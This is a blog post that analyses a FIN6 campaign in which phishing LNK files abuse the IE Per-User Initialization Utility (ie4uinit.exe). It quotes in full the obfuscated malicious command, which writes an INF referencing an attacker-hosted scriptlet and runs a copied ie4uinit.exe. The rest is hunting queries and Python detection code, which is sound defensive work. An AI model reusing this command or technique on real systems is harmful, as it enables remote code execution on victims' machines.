165. FIN6 Abuses IE Per-User Initialization Utility
Hello everyone!
Let's look at another curious example of the System Binary Proxy Execution (T1218) technique. DomainTools reported on a FIN6 (Skeleton Spider) campaign that included phishing with fake resumes.
The adversary distributed archives with malicious LNK files. Such a file executed an obfuscated command, for example:
%ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et "Enjoy=a" && !Alter!et "Careers=default" && !Alter!et "Tunnel=!Twist!inf" && !Alter!et "Dishes=ieui!Womens!t!Tunnel!" && c!Cloth!ll !Alter!et "Tales=%!Enjoy!ppd!Cloth!ta%\micro!Alter!oft\" && s!Disorder!t "Bonds=!Tales!!Dishes!" && (for /D %l in ("[DFF]" "ieu%Forget%!Tunnel!" "[s!Grass!ring!Alter!]" "!Alter!hortsvcn!Enjoy!me=' '" "Clever=/" "Forget=i!Womens!t" "Popular=com" "Unhappy=%time%" "Mattress=:;Bathrooms" "Tooth=h" "Dinner=t;Characters" "!Alter!ervicen!Enjoy!me=' '" "Editors=b;Metals" "[!Streams!e!Alter!tinationdirs]" "!Careers!destdir=11" "DFF=01" "[7E102F]" "sc\" "ro%Editors%j,NI,%Tooth%%Dinner%%Dinner%p%Mattress%%Clever%%Clever%lsfyf!Twist!kimberlykamara!Twist!%Popular%/winapayf" "[!Person!]" "signat!Trick!!Involves!dows nt$" "[!Careers!in!Alter!tall.windows7]" "!Streams!elfil!Disorder!s=DFF" "Un\" "Register\" "OCXs=7E102F" ) do @echo %~l)>"!Bonds!" && !Alter!et "Coyote=ie4ui!Womens!t.!Disorder!xe" && !Builders!all x!Builders!opy /Y /C /Q %win!Streams!ir%\!Alter!ys!Grass!!Disorder!m32\!Coyote! "!Tales!*" && !Tales!!Coyote! -base!Armor!
The script runs under cmd /v (delayed expansion) and assembles every keyword and string from fragments stored in throwaway variables (!Alter!et "X=Y" is just set "X=Y"). It writes a malicious INF file to %AppData%\Microsoft\ieuinit.inf (ieui + ni + t + .inf in the obfuscated form) and abuses xcopy to place the IE Per-User Initialization Utility (ie4uinit.exe) in the same directory:
xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "%APPDATA%\microsoft\*"
Finally, the script executes the copied ie4uinit.exe, which loads the INF file:
"%AppData%\Microsoft\ie4uinit.exe" -basesettings
So, first, we can detect copying of the IE Per-User Initialization Utility via xcopy:
event_type: "processcreatewin"
AND
proc_file_name: "xcopy.exe"
AND
cmdline: "ie4uinit.exe"
Second, executions of the IE Per-User Initialization Utility from uncommon locations:
event_type: "processcreatewin"
AND
proc_file_name: "ie4uinit.exe"
AND NOT
proc_file_path: ("system32" OR "syswow64")
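The two queries above, re-implemented as an added example (not from the original post) and run over constructed process-creation events that carry the same fields (event_type, proc_file_name, proc_file_path, cmdline). It goes slightly beyond the page in two places, both assumptions of this example rather than part of the published rules: the second rule also accepts an original_file_name field (PE version metadata, as Sysmon Event ID 1 records it) so a renamed copy of ie4uinit.exe is still caught, and the location check compares the parent directory against the real system directories instead of matching "system32" as a substring anywhere in the path, which an attacker could satisfy with a user-writable folder of that name.

```python
"""
Added example: the xcopy and ie4uinit.exe hunting rules from the post, run
over constructed events.  Not real telemetry; paths follow the post's sample.
"""
import ntpath

# Exact parent directories that count as expected locations for ie4uinit.exe
# (assumption: default Windows install drive/path).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "xcopy.exe",
     "proc_file_path": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r'xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\u\AppData\Roaming\microsoft\*"'},
    {"event_type": "processcreatewin", "proc_file_name": "ie4uinit.exe",
     "proc_file_path": r"C:\Users\u\AppData\Roaming\Microsoft\ie4uinit.exe",
     "cmdline": r'"C:\Users\u\AppData\Roaming\Microsoft\ie4uinit.exe" -basesettings'},
    # benign: the real binary in System32
    {"event_type": "processcreatewin", "proc_file_name": "ie4uinit.exe",
     "proc_file_path": r"C:\Windows\System32\ie4uinit.exe",
     "cmdline": r'"C:\Windows\System32\ie4uinit.exe" -basesettings'},
    # benign: unrelated xcopy
    {"event_type": "processcreatewin", "proc_file_name": "xcopy.exe",
     "proc_file_path": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r'xcopy /Y D:\build\release\* C:\deploy'},
    # renamed copy: file name changed, PE original file name still ie4uinit.exe
    {"event_type": "processcreatewin", "proc_file_name": "svc.exe",
     "proc_file_path": r"C:\Users\u\AppData\Roaming\Microsoft\svc.exe",
     "cmdline": r'"C:\Users\u\AppData\Roaming\Microsoft\svc.exe" -basesettings',
     "original_file_name": "ie4uinit.exe"},
]


def rule_xcopy_ie4uinit(ev):
    """Rule 1: xcopy.exe whose command line mentions ie4uinit.exe."""
    return (ev.get("event_type") == "processcreatewin"
            and ev.get("proc_file_name", "").lower() == "xcopy.exe"
            and "ie4uinit.exe" in ev.get("cmdline", "").lower())


def rule_ie4uinit_uncommon_path(ev):
    """Rule 2: ie4uinit.exe (by file name or PE original file name) started
    from any directory other than System32/SysWOW64."""
    names = {ev.get("proc_file_name", "").lower(),
             ev.get("original_file_name", "").lower()}
    if ev.get("event_type") != "processcreatewin" or "ie4uinit.exe" not in names:
        return False
    parent = ntpath.dirname(ev.get("proc_file_path", "")).lower()
    return parent not in SYSTEM_DIRS


RULES = {"xcopy_ie4uinit": rule_xcopy_ie4uinit,
         "ie4uinit_uncommon_path": rule_ie4uinit_uncommon_path}


def run_rules(events):
    """Return (rule name, event index) for every event that matches a rule."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, i in run_rules(EVENTS):
        print(f"{name}: {EVENTS[i]['cmdline']}")
```

On the constructed events the first rule fires on the xcopy of ie4uinit.exe, the second on the copy started from %AppData% and on the renamed copy, while the System32 execution and the unrelated xcopy stay quiet.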
See you tomorrow!